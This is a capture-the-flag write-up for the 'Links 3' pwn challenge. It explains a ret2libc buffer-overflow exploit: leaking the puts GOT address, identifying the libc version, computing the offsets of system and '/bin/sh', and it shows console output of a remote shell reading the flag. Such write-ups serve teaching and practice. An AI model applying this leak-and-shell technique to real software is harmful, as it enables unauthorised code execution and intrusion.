Links 3

Video Walkthrough

Description

And now you guys are exploiting my View Time feature that I put there solely for your convenience? Fine, then - no more time for you!

download challenge binary

Solution

I'll keep this short; since Links 2, the view_time function has been removed. We no longer have system in the GOT, but that doesn't matter.

As is common practice with stack-based buffer overflows, we can leak any Lib-C function address and then calculate our way back to the base of the binary. From there, we can add any offset we like to get the function of choosing, e.g. libc.system or a string, e.g. libc."/bin/sh".

I chose to leak got.puts, when run against the server it leaks 0x7fbfd373eed0. Once we get an address of a known function, we can take it to libc.blukat.me or libc.rip and provide the function name and address.

We'll get a list of possible Lib-C library versions. The more functions we leak, the more we can narrow down the search.

In this case, the correct version was libc6_2.35-0ubuntu3_amd64, so we plug in the correct offsets.

libc = puts - 0x80ed0
system = libc + 0x50d60

Running the binary, we get a shell.

python exploit.py REMOTE puzzler7.imaginaryctf.org 2998
[+] Opening connection to puzzler7.imaginaryctf.org on port 2998: Done
[*] leaked got_puts: 0x7f470992eed0
[*] got_system: 0x7f47098fed60
[*] Switching to interactive mode
 What data do you want to write to this element?

>>> $ cat flag.txt
ictf{dammit_I'm_never_gonna_mix_up_64_and_0x64_again_it's_cost_me_three_flags_already}

note: If this write-up didn't make much sense, review Links 1 and Links 2 write-ups first 🙂

Solve Script